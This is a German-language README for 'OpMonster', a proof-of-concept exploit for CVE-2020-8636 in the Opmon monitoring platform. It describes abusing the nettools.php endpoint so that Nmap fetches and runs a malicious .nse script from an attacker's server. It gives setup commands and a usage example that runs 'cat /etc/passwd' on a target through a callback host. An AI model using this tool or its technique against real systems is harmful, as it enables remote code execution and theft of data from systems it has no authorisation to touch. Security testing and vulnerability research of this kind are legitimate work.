
CVE-2020-8636 authentifizierter Remote-Code-Execution-Exploit für Opmon
Über • Installation • Verwendung • Lizenz
OpMonster ist ein Proof-of-Concept-Exploit für CVE-2020-8636, eine Schwachstelle zur Remote-Codeausführung in der Überwachungsplattform Opmon. Er missbraucht den nettools.php-Endpunkt, mit dem Sie Nmap mit beliebigen --script-Optionen ausführen können. Der Exploit veranlasst Opmon, ein schädliches .nse-Nmap-Skript von einem von Ihnen kontrollierten Server abzurufen (über http-fetch), legt es in /tmp ab und führt es anschließend aus, um Ihren Befehl auf dem Zielsystem auszuführen und die Ausgabe auszugeben.
Entdeckt und entwickelt von @phor3nsic. Weitere Details: Drei CVEs zu Opmon.
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests
Starten Sie zunächst einen Webserver auf einem Host, den das Zielsystem erreichen kann, in einem Verzeichnis, aus dem das generierte .nse-Skript heruntergeladen werden kann (der Exploit schreibt das Skript in das aktuelle Verzeichnis):
php -S 0.0.0.0:1337
Führen Sie dann den Exploit mit vier Positionsargumenten aus:
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
Der Exploit bricht mit einer Meldung ab, wenn das Zielsystem das Skript nicht herunterlädt ("nicht verwundbar") oder keine ausgehende Verbindung zu Ihrem Server herstellen kann.
Nur für autorisierte Sicherheitstests und zu Bildungszwecken. Sie sind dafür verantwortlich, wie Sie es verwenden.
| Argument | Beschreibung |
|---|
HOST | Basis-URL des Ziel-Opmon (z. B. https://vulnhost.com) |
LHOST | Host Ihres Servers, der das .nse-Skript bereitstellt |
LPORT | Port Ihres Servers |
CMD | Auf dem Zielsystem auszuführender Befehl |